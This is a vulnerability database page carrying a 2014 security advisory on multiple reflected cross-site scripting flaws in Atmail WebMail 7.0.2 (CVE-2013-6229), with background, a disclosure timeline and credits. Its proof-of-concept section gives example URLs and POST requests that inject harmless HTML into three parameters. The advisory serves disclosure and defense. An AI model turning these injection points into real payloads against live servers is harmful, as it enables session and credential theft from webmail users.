Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormVicente Aguilera DiazPACKETSTORM:125097
HistoryFeb 07, 2014 - 12:00 a.m.

Atmail WebMail 7.0.2 Cross Site Scripting

2014-02-0700:00:00
Vicente Aguilera Diaz
packetstormsecurity.com
28

0.002 Low

EPSS

Percentile

55.6%

JSON
`=============================================  
INTERNET SECURITY AUDITORS ALERT 2013-014  
- Original release date: March 25th, 2013  
- Last revised: March 25th, 2013  
- Discovered by: Vicente Aguilera Diaz  
- Severity: 4.3/10 (CVSSv2 Base Scored)  
- CVE-ID: CVE-2013-6229  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Multiple reflected XSS vulnerabilities in Atmail WebMail.  
  
  
II. BACKGROUND  
-------------------------  
Atmail allows users to access IMAP Mailboxes of any server of your  
choice. The software provides  
  
a comprehensive email-suite for accessing user mailboxes, and provides  
an inbuilt Calendar and  
  
Addressbook features. The WebMail Client of Atmail supports any existing  
IMAP server running  
  
under Unix/Linux or Windows systems.  
  
  
III. DESCRIPTION  
-------------------------  
Has been detected multiple reflected XSS vulnerability:  
1) in the view attachment message process  
2) in the search message with filter process  
3) in the delete message process  
  
These vulnerabilities allows the execution of arbitrary HTML/script code  
to be executed in the  
  
context of the victim user's browser.  
  
  
IV. PROOF OF CONCEPT  
-------------------------  
1) View attachment message process  
When a user opens a file attachment in an email, the link is as follows:  
  
http://<atmail-  
  
server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/<fil  
  
e>  
  
where:  
- <atmail-server> is the Atmail WebMail server  
- <ID> is the unique ID for the message that contains the attachment  
- <file> is the attachment file in the message  
  
A malicious user can inject arbitrary HTML/script code in the <file>  
parameter. For example:  
  
http://<atmail-  
  
server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/test  
  
.txt<H1><marquee>This+is+an+XSS+example  
  
  
2) Search message with filter process  
When a user search messages with a filter (for example, using the  
"Friends" filter), the link is  
  
as follows:  
  
POST  
  
/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchRes  
  
ultsTab5 HTTP/1.1  
Host: <atmail-server>  
...  
searchQuery=&goBack=6&from=&to=&subject=&body=&filter=<filter>  
  
where:  
- <atmail-server> is the Atmail WebMail server  
- <filter> is the name of the selected filter by the user  
  
A malicious user can inject arbitrary HTML/script code in the <filter>  
parameter. Also, This POST  
  
HTTP Request can become a GET HTTP Request, making it easier to exploit  
the vulnerability.  
For example:  
  
http://<atmail-  
  
server>/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/se  
  
archResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=friends<H1><marquee>This  
  
+is+an+XSS+example  
  
  
3) Delete message process  
When a user select and delete a message, the link is as follows:  
  
POST  
/index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash  
HTTP/1.1Host:  
  
<atmail-server>  
...  
resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B  
  
%5D=<MailID>&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen%5B15%5D=0&unseen%5B14%5D=0&unseen  
  
%5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen%5B9%5D=0&unseen%5B8%5D=0&unseen  
  
%5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen%5B2%5D=0&unseen%5B1%5D=0  
  
where:  
- <atmail-server> is the Atmail WebMail server  
- <MailID> is the identifier (number) of the mail selected by the user  
  
A malicious user can inject arbitrary HTML/script code in the <MailID>  
parameter. Also, This POST  
  
HTTP Request can become a GET HTTP Request, making it easier to exploit  
the vulnerability.  
For example:  
  
http://<atmail-server>/index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash?  
  
resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B  
  
%5D=<H1><marquee>This+is+an+XSS+example&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen  
  
%5B15%5D=0&unseen%5B14%5D=0&unseen%5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen  
  
%5B9%5D=0&unseen%5B8%5D=0&unseen%5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen  
  
%5B2%5D=0&unseen%5B1%5D=0  
  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted  
user's browser, this can  
  
leverage to steal sensitive information as user credentials, personal  
data, etc.  
  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Tested in Atmail 7.0.2. Other versions may be affected too.  
  
  
VII. SOLUTION  
-------------------------  
-  
  
  
VIII. REFERENCES  
-------------------------  
http://www.atmail.com  
http://www.isecauditors.com  
  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered  
by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).  
  
  
X. REVISION HISTORY  
-------------------------  
March 9, 2013: Initial release  
March 22, 2013: Last revision  
  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
March 9, 2013: Discovered by Internet Security Auditors  
March 22, 2013: Advisory updated with new XSS vulnerable resources  
October 08, 2013: Firt contact with developer team  
October 16, 2013: Second contact with developer team  
November 28, 2013: Third contact with developer team  
January 10, 2014: Last contact and release  
  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with  
no warranties or  
  
guarantees of fitness of use or otherwise. Internet Security Auditors  
accepts no responsibility  
  
for any damage caused by the use or misuse of this information.  
  
  
XIII. ABOUT  
-------------------------  
Internet Security Auditors is a Spain based leader in web application  
testing, network security,  
  
penetration testing, security compliance implementation and assessing.  
Our clients include some  
  
of the largest companies in areas such as finance, telecommunications,  
insurance, ITC, etc. We  
  
are vendor independent provider with a deep expertise since 2001. Our  
efforts in R&D include  
  
vulnerability research, open security project collaboration and  
whitepapers, presentations and  
  
security events participation and promotion. For further information  
regarding our security  
  
services, contact us.  
`

Related

securityvulns 1
cvelist 1
cve 1
prion 1
securityvulns
securityvulns
[ISecAuditors Security Advisories] Multiple reflected XSS vulnerabilities in Atmail WebMail
2014-02-11 00:00:00
cvelist
cvelist
CVE-2013-6229
2014-02-12 15:00:00
cve
cve
CVE-2013-6229
2014-02-12 15:55:00
prion
prion
Cross site scripting
2014-02-12 15:55:00

0.002 Low

EPSS

Percentile

55.6%

JSON
Related for PACKETSTORM:125097
securityvulns1cvelist1cve1prion1